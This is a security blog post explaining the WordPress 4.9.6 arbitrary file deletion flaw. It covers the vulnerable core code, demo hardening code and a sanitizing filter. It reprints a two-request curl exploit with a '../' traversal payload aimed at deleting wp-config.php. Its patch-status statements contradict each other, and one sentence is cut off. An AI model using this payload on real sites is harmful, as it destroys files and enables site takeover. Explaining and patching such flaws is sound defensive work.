Table of Contents:
Who was affected?
How can a hacker exploit the arbitrary file deletion vulnerability in WordPress?
Why reveal it if it's critical?
Where is the vulnerability found?
Arbitrary file deletion exploit code
How to fix the WordPress arbitrary file deletion vulnerability?
This wide adoption makes WordPress an attractive target for cyber criminals. The RIPS team disclosed an arbitrary file deletion flaw in the WordPress core on June 26, 2018. Karim El Ouerghemmi from RipsTech disclosed a critical flaw in WordPress that allows any author, publisher or administrator to delete any file from an installation, in any folder, without any tools.
In less than 1 minute, a site can be destroyed. The flaw had been known to the WordPress security team for about 7 months, but no fix had been released, so Karim disclosed it publicly (see references).
The vulnerability was fixed in WordPress 4.9.7 (also see Latest WordPress Versions), released on July 5. To exploit this issue successfully, the attacker needs access to edit and delete media files, which can be obtained by taking over an Author account or by targeting sites that expose the media functionality through various plugins. Websites that had not updated WordPress and were still running outdated versions with specific media plugins installed were the ones most affected by this exploit.
Unfortunately yes: in less than 1 minute an author can remove any file from the site, such as wp-config.php. An attacker could also delete the main file of a security extension so that it no longer loads, and then carry out more serious attacks. After all, breaking a site is only of interest to a hacker as a step towards stealing its data.
Attackers can leverage the way the WordPress installation mechanism works, to gain arbitrary code execution by.
You may have already watched videos of this exploit that use the JavaScript console to inject hexadecimal code, add and call a new JS function, launch a new AJAX call and so on. That works as well, but it is unnecessary: just change two values plus a last one, the path of the file to delete, and that's all.
The answer is in the question: because it is critical, and if a security consultant can find it, a hacker can too. We (me, you) need to inform everyone about this vulnerability and show that it is easy to hack a WordPress site if it has an author/publisher/admin account other than your own.
An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.
An arbitrary file deletion flaw occurs when unsanitized input can be passed to a file deletion function.
In PHP, an arbitrary file deletion occurs when the unlink() function is called and user input can affect part or all of its $filename parameter, the path of the file to delete, without proper sanitization. Typical inputs are "../" sequences that walk out of the directory the application intended, so the check that matters is whether the resolved path still lies inside that directory.
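The following PHP is an added example, not code from WordPress core or from the original post. It places the unsafe pattern described above next to a hardened delete helper that resolves the requested name with realpath() and refuses anything that lands outside the allowed upload directory. The directory layout and file names are constructed for the demonstration.

```php
<?php
// Added example (not WordPress core code): an unsafe delete handler next to a
// hardened one. The upload directory and file names below are assumptions
// constructed for this demonstration.

// Vulnerable pattern: the request parameter flows straight into unlink().
// A value such as "../../wp-config.php" escapes $uploadDir.
function delete_upload_unsafe(string $uploadDir, string $name): bool
{
    return @unlink($uploadDir . '/' . $name);
}

// Hardened pattern: resolve the real path and require it to stay inside the
// allowed directory. Traversal sequences, symlinks pointing outside the tree
// and embedded null bytes are all rejected.
function resolve_inside(string $baseDir, string $name): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                                   // base directory missing
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false) {
        return null;                                   // does not exist or dangling symlink
    }
    // Compare with a trailing separator so "/srv/uploads2" cannot pass
    // for a base of "/srv/uploads".
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // resolved outside the allowed tree
    }
    return $target;
}

function delete_upload_safe(string $uploadDir, string $name): bool
{
    $path = resolve_inside($uploadDir, $name);
    if ($path === null || !is_file($path)) {
        return false;                                  // refuse instead of unlinking elsewhere
    }
    return unlink($path);
}

// Demonstration on a throwaway directory tree (constructed for this example).
$root    = sys_get_temp_dir() . '/afd-demo-' . getmypid();
$uploads = $root . '/uploads';
mkdir($uploads, 0700, true);
file_put_contents($root . '/wp-config.php', "<?php // placeholder config\n");
file_put_contents($uploads . '/image-150x150.jpg', 'jpg');

// Traversal attempt: refused, and wp-config.php is left in place.
$blocked = delete_upload_safe($uploads, '../wp-config.php');
$configStillThere = file_exists($root . '/wp-config.php');

// Legitimate request for a file inside the upload directory: deleted.
$removed = delete_upload_safe($uploads, 'image-150x150.jpg');

printf("traversal blocked: %s, config intact: %s, legitimate delete: %s\n",
    var_export(!$blocked, true), var_export($configStillThere, true), var_export($removed, true));

// Clean up the throwaway tree.
@unlink($root . '/wp-config.php');
@rmdir($uploads);
@rmdir($root);
```

The containment check is done on the resolved path rather than on the raw string, because filtering "../" textually misses encoded variants and symlinks; realpath() gives the path the kernel will actually open, and the prefix comparison is the only assertion that needs to hold.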
The flaw resides in the WordPress core; the code that triggers it is in the wp-includes/post.php file:
The function wp_delete_attachment() is the culprit here:
```php
function wp_delete_attachment( $post_id, $force_delete = false ) {
    global $wpdb;
    // (other code omitted) In core, $file and $uploadpath are set earlier in the function:
    $meta       = wp_get_attachment_metadata( $post_id );
    $file       = get_attached_file( $post_id );
    $uploadpath = wp_get_upload_dir();

    if ( ! empty( $meta['thumb'] ) ) {
        // Don't delete the thumb if another attachment uses it.
        if ( ! $wpdb->get_row( $wpdb->prepare(
            "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d",
            '%' . $wpdb->esc_like( $meta['thumb'] ) . '%',
            $post_id
        ) ) ) {
            // The stored thumb value replaces the basename of the attachment's own path,
            // so a value containing "../" walks out of the upload directory.
            $thumbfile = str_replace( basename( $file ), $meta['thumb'], $file );
            /** This filter is documented in wp-includes/functions.php */
            $thumbfile = apply_filters( 'wp_delete_file', $thumbfile );
            @ unlink( path_join( $uploadpath['basedir'], $thumbfile ) );
        }
    }
    // (remainder of the function omitted)
}
```
The call to unlink() deletes the file whose name is stored in the thumb metadata. But where does that value come from?
Let's see it in /wp-admin/post.php:
```php
switch ( $action ) {
    ⋮
    case 'editattachment':
        check_admin_referer( 'update-post_' . $post_id );
        ⋮
        // Update the thumbnail filename
        $newmeta          = wp_get_attachment_metadata( $post_id, true );
        $newmeta['thumb'] = $_POST['thumb'];   // raw request value, stored as-is
        wp_update_attachment_metadata( $post_id, $newmeta );
        ⋮
```
The metadata is just the raw value of the user's form field: no sanitization, no filter, no escaping, nothing.
WordPress 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.wordpress.org
# Software Link: http://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
First request (the editattachment action shown above) stores the thumb value:
```shell
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
```
Second request deletes the attachment, which runs wp_delete_attachment() and its unlink() call:
```shell
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
```
SEE REF BELOW.
The described arbitrary file deletion vulnerability remained unpatched in the WordPress core at the time of writing. Because of this, the team at RIPS developed a temporary fix, provided in the snippet below. To integrate this fix into an existing WordPress installation, add it to the functions.php
file of the currently active theme or child theme.
You can use the following patch by Karim (with a different function name to avoid code conflicts):
It hooks into the wp_update_attachment_metadata()
call and makes sure that the data provided for the meta value thumb
does not contain any parts that make path traversal possible. Thus, no security-relevant files can be deleted.
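The following PHP is an added example written for this page; it is not Karim's patch and not WordPress core code. It implements the mechanism just described: a filter on 'wp_update_attachment_metadata' (a real WordPress filter that receives the metadata array and the post ID) that reduces the thumb value to a bare filename before it is stored, so the later path_join() in wp_delete_attachment() cannot leave the upload directory. The function name wphh_sanitize_attachment_thumb is an assumption chosen to avoid conflicts; drop the snippet into the active theme's functions.php as a stopgap until the site is on 4.9.7 or later.

```php
<?php
// Added example (not the RIPS hotfix, not WordPress core): sanitize the
// "thumb" attachment metadata before it is persisted. Assumes WordPress's
// add_filter() and the 'wp_update_attachment_metadata' filter, which passes
// ( $data, $post_id ). The function name is an assumption.

add_filter( 'wp_update_attachment_metadata', 'wphh_sanitize_attachment_thumb', 10, 2 );

function wphh_sanitize_attachment_thumb( $data, $post_id ) {
    if ( ! is_array( $data ) || ! isset( $data['thumb'] ) ) {
        return $data;                       // nothing to sanitize
    }

    $thumb = (string) $data['thumb'];

    // Reduce to a bare filename: this discards every directory component,
    // including "../" sequences and absolute prefixes. Null bytes are removed
    // first so they cannot truncate the path inside a later C-level call.
    $clean = basename( str_replace( "\0", '', $thumb ) );

    if ( $clean === '' || $clean === '.' || $clean === '..' ) {
        unset( $data['thumb'] );            // no usable filename; store nothing
        return $data;
    }

    if ( $clean !== $thumb ) {
        // The submitted value was not a plain filename. Keep a trace for
        // incident review; the request itself still succeeds with the
        // sanitized value.
        error_log( sprintf(
            'wphh: attachment %d submitted thumb "%s", stored "%s"',
            (int) $post_id,
            $thumb,
            $clean
        ) );
    }

    $data['thumb'] = $clean;
    return $data;
}
```

Because the thumbnail of an attachment always lives in the same directory as the attachment itself, a bare filename loses nothing legitimate, and the error_log() line turns every traversal attempt into a log entry that can be correlated with the account that submitted it.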
WP Hacked Help is by far one of the best security scanners in the WordPress community. We protect your site against multiple attacks such as brute force attacks, DDoS attacks, SQL injections, etc.
WP Hacked Help also has a firewall that analyses all visitor traffic just before it reaches your website. Hackers are blocked before they can reach and hack your website.
It also has a malware scanner that scans the WordPress core, themes and plugins of your site to detect the presence of malware.
If you are looking for a reliable and affordable way to scan and secure your WordPress website then feel free to reach us.